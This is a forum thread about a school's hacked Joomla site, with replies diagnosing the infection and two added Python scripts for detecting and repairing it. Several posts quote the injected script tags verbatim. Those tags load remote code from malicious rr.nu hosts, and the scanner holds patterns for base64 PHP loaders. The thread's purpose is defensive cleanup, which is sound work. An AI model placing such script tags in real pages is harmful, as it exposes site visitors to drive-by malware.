Can you have a website virus?
(Technical forum thread: Internet Related/Filtering/Firewall)

  1. #1 rocknrollstar (Hampshire)

    Hi, I help to run a Joomla website, hosted by DreamHosts. Something strange has happened. When the website is loaded in FF and Chrome, everything's fine. However, when loaded in IE (I'm using v9), it gives a message "windows antivirus has 2012 has found critical process activity...." which I understand is a malware issue.

    I can't figure out how it got there, or more importantly, how to get rid of it! The website is Silchester School (ignore the 3MB pic on the front!)

    Thanks in advance for your help.

  2. #2 SYNACK
    Do you have any ad banner code on it, and is it the latest version/patch of Joomla? The common open-source variants are massively sought after by scripted attacks, which is how they end up affecting stacks of sites all at the same time. This may be what happened to yours; I'd be tempted to restore from a backup and then make sure that all patches/upgrades have been applied, take another backup and hope that the flaw has actually been fixed by the maintainers of the code. This includes making sure your modules are up to date if you have used extra ones.
    Last edited by SYNACK; 13th May 2012 at 03:46 PM.

  3. #3 Steve21 (Swindon)
    Quote Originally Posted by rocknrollstar (the opening post, quoted in full above)
    Silchester School

    2012/05/13 15:42:26 +0100 IP-BLOCK 91.230.147.204 (Type: outgoing, Port: 53767, Process: iexplore.exe)

    Russian Federation Attacks!

    <script src="http://deploy92mentcat.rr.nu/mm.php?d=x1"></script>

    You have injected code in it, so it loads every time.

    Guessing you're blocking javascript on FF so it's not showing it

    - Edit - Most likely either old version of cms, old insecure addons (notice lots of plugins loading), or not filtering input in terms of code

    Steve
    Last edited by Steve21; 13th May 2012 at 03:48 PM.

  4. #4 Steve21 (Swindon)
    Seems it's spreading too -

    Check your URLs as they've been modded

    <script src="http://deploy92mentcat.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Letters
    Suspicious domain detected.
    <script src="http://resp86ectsc.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Silchester School
    Suspicious domain detected.
    <script src="http://subs31tanc.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Contacts
    Suspicious domain detected.
    <script src="http://murder63program.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Internet Safety
    Suspicious domain detected.
    <script src="http://ormi35dable.rr.nu/mm.php?d=x1"></script>

    Security warning in the URL:
    Catering
    Suspicious domain detected.
    <script src="http://olla91rsnew.rr.nu/mm.php?d=x1"></script>

  5. #5 Cache (Cumbria)
    I host on dreamhost also for my personal sites and had a breach somehow in February where all my php files were infected - I'd check the modified date and the top of a few php files for what will likely be a base64 encoded string, as well as for a file called r.php.

    What I ended up doing for my wordpress install was deleting and reuploading all the files, but for all other files I followed the instructions on this page for the cleaner script http://www.php-beginners.com/solve-w...ttack-fix.html
    Last edited by Cache; 13th May 2012 at 04:18 PM.
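The checks Steve21 (posts #3 and #4) and Cache (post #5) describe, combined into one scanner as an added example; this is not code from the thread, from Joomla or from DreamHost. It walks a web root and reports any `<script src>` that loads from a host other than the site's own (every injected tag in the thread points at a throwaway `*.rr.nu` host), an `eval(base64_decode(...))` loader in the first few kilobytes of a PHP file, and a file named `r.php`, and records each file's modification time so recently touched files stand out. The sample web root, the "own host" `www.example.invalid` and the base64 payload string are constructed for the demo.

```python
import re
import tempfile
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Set

# <script src="http(s)://HOST/..."> loading from a host that is not the site's own.
# Legitimate Joomla includes are normally relative (/media/system/js/...).
EXTERNAL_SCRIPT = re.compile(r'<script[^>]*\ssrc=["\']https?://([^/"\'\s>]+)', re.I)
# Loader prepended to PHP files by mass infections: eval(base64_decode("..."))
BASE64_LOADER = re.compile(
    r'eval\s*\(\s*(?:gz(?:inflate|uncompress)\s*\(\s*)?base64_decode\s*\(', re.I)
SUSPICIOUS_NAMES = {"r.php"}          # dropped file named in the thread
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".tpl"}
HEAD_BYTES = 4096                     # the loader sits at the top of the file


def scan_file(path: Path, own_hosts: Set[str]) -> List[Dict[str, str]]:
    """Return one finding dict per indicator found in a single file."""
    text = path.read_text(encoding="utf-8", errors="replace")
    mtime = datetime.fromtimestamp(path.stat().st_mtime).isoformat(timespec="seconds")
    findings: List[Dict[str, str]] = []

    def add(kind: str, detail: str) -> None:
        findings.append({"file": str(path), "kind": kind, "detail": detail, "mtime": mtime})

    if path.name.lower() in SUSPICIOUS_NAMES:
        add("suspicious-filename", path.name)
    for m in EXTERNAL_SCRIPT.finditer(text):
        host = m.group(1).lower()
        if host not in own_hosts:
            add("external-script", f"line {text.count(chr(10), 0, m.start()) + 1}: {host}")
    m = BASE64_LOADER.search(text[:HEAD_BYTES])
    if m:
        add("base64-loader", f"line {text.count(chr(10), 0, m.start()) + 1}")
    return findings


def scan_webroot(root: Path, own_hosts: Set[str]) -> List[Dict[str, str]]:
    """Walk the web root and scan every file with a scannable suffix."""
    results: List[Dict[str, str]] = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES:
            results.extend(scan_file(p, own_hosts))
    return results


def demo() -> List[Dict[str, str]]:
    """Build a constructed web root in a temp dir and scan it."""
    root = Path(tempfile.mkdtemp(prefix="joomla-scan-"))
    (root / "templates").mkdir()
    # Clean template: only a relative script include.
    (root / "templates" / "index.php").write_text(
        "<?php defined('_JEXEC') or die; ?>\n<html><head>\n"
        '<script src="/media/system/js/core.js"></script>\n</head></html>\n')
    # Infected template: the kind of tag quoted in the thread.
    (root / "index.php").write_text(
        "<?php\n// template code\n?>\n<html><head>\n"
        '<script src="http://deploy92mentcat.rr.nu/mm.php?d=x1"></script>\n'
        "</head></html>\n")
    # Prepended loader; the base64 string is a harmless constructed placeholder.
    (root / "configuration.php").write_text(
        "<?php eval(base64_decode('cGxhY2Vob2xkZXI=')); ?>\n"
        "<?php class JConfig { public $offline = '0'; } ?>\n")
    (root / "r.php").write_text("<?php // dropped file ?>\n")
    return scan_webroot(root, own_hosts={"www.example.invalid"})


if __name__ == "__main__":
    for f in demo():
        print(f"{f['kind']:<20} {f['file']}  {f['detail']}  (modified {f['mtime']})")
```

Run it against a copy of the site's document root with `own_hosts` set to the site's real hostname(s); anything it reports should be compared against the last known-good backup before deciding whether to restore or clean, since a hit on an external script only tells you the file was modified, not how the attacker got in.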

  6. #6 Arthur
    This must be related to the recent PHP-CGI exploit...

    151,000 domains attacked via dangerous PHP hole
    More than 151,000 domains held by US hosting provider Dreamhost have been targeted by attackers exploiting a dangerous and long-standing PHP vulnerability.

    As reported by SC Magazine, the PHP-CGI vulnerability had existed since 2004 and allowed remote code execution on current versions of the language.

    The hole has now been patched, but only after preceding fixes (versions 5.3.12 and 5.4.2) failed to work.

    Some 230,000 attacks against the hosts directly attempted to exploit the vulnerability, according to SpiderLabs which obtained the figures from Dreamhost. (Source)

  7. #7 hit (London)
    Check the contents of the db table jos_menu. URLs to joomla pages should be something like index.php?option=com_content&view=article&id=14 (in the link field). Even if you reload the web pages the problem won't be fixed unless you have a backup of the database. You can fix it without, but it's time consuming.
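The jos_menu audit hit describes, as an added example that is not code from the thread or from Joomla. It classifies each row's `link` field (an internal `index.php?option=com_...` route for component items, a plain URL for url-type items, and never any HTML or script), shows the cleaned link for injected rows, and produces parameterised UPDATE statements that a sysadmin can review before running. The column set `id, name, type, link` is assumed from Joomla 1.5's jos_menu schema; the in-memory SQLite table and its rows are constructed for the demo, with the injected tails modelled on the tags quoted earlier in the thread.

```python
import re
import sqlite3
from typing import Dict, List, Tuple

# Internal Joomla route, e.g. index.php?option=com_content&view=article&id=14
INTERNAL_LINK = re.compile(r'^index\.php\?option=com_[a-z0-9_]+(?:&[a-z_]+=[\w%.-]*)*$', re.I)
# A url-type menu item may legitimately point at an absolute URL.
ABS_URL = re.compile(r'^https?://[^\s<>"\']+$', re.I)
# Markup or a script scheme never belongs in a link field.
MARKUP = re.compile(r'[<>"]|javascript:', re.I)


def classify_link(item_type: str, link: str) -> str:
    """Return 'ok', 'injected' (markup inside the field) or 'review'."""
    if MARKUP.search(link):
        return "injected"
    if item_type == "component":
        return "ok" if INTERNAL_LINK.match(link) else "review"
    if item_type == "url":
        return "ok" if ABS_URL.match(link) else "review"
    return "ok"  # separator/alias items carry no routable link


def strip_injection(link: str) -> str:
    """Keep only the part of the link before the first injected character."""
    m = MARKUP.search(link)
    return link if m is None else link[: m.start()]


def audit_menu(conn: sqlite3.Connection) -> List[Dict[str, object]]:
    """Return every jos_menu row whose link is not plainly legitimate."""
    flagged: List[Dict[str, object]] = []
    for id_, name, item_type, link in conn.execute(
            "SELECT id, name, type, link FROM jos_menu ORDER BY id").fetchall():
        verdict = classify_link(item_type, link)
        if verdict != "ok":
            flagged.append({"id": id_, "name": name, "verdict": verdict,
                            "link": link, "cleaned": strip_injection(link)})
    return flagged


def repair_statements(flagged: List[Dict[str, object]]) -> List[Tuple[str, Tuple]]:
    """Parameterised UPDATEs for the injected rows; run them only after review."""
    return [("UPDATE jos_menu SET link = ? WHERE id = ?", (f["cleaned"], f["id"]))
            for f in flagged if f["verdict"] == "injected"]


def demo() -> Tuple[List[Dict[str, object]], List[Dict[str, object]]]:
    """Constructed jos_menu table: audit it, apply the repairs, audit again."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jos_menu (id INTEGER PRIMARY KEY, name TEXT, type TEXT, link TEXT)")
    rows = [
        (1, "Home", "component", "index.php?option=com_content&view=frontpage"),
        (2, "Letters", "url", "http://www.example.invalid/letters"),   # constructed host
        (3, "Contacts", "component",
         'index.php?option=com_contact&view=category&id=2">'
         '<script src="http://murder63program.rr.nu/mm.php?d=x1"></script>'),
        (4, "Catering", "component",
         "index.php?option=com_content&view=article&id=14"
         '<script src="http://olla91rsnew.rr.nu/mm.php?d=x1"></script>'),
        (5, "Old article", "component", "index.php?option=com_content&task=view&id=7&Itemid=3"),
    ]
    conn.executemany("INSERT INTO jos_menu VALUES (?, ?, ?, ?)", rows)
    before = audit_menu(conn)
    for sql, params in repair_statements(before):
        conn.execute(sql, params)
    conn.commit()
    return before, audit_menu(conn)


if __name__ == "__main__":
    before, after = demo()
    for f in before:
        print(f"id={f['id']} {f['name']!r}: {f['verdict']} -> {f['cleaned']}")
    print(f"rows still flagged after repair: {len(after)}")
```

Against a real database, run the audit with a read-only connection first and diff the cleaned links against the April backup hit mentions; the `review` verdict exists so that unusual but legitimate items (custom components, external links) are looked at by a person rather than rewritten automatically.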

  8. #8 rocknrollstar (Hampshire)
    Great, thanks everyone for your help. I've used a backup from April; a little behind, but better than nothing.
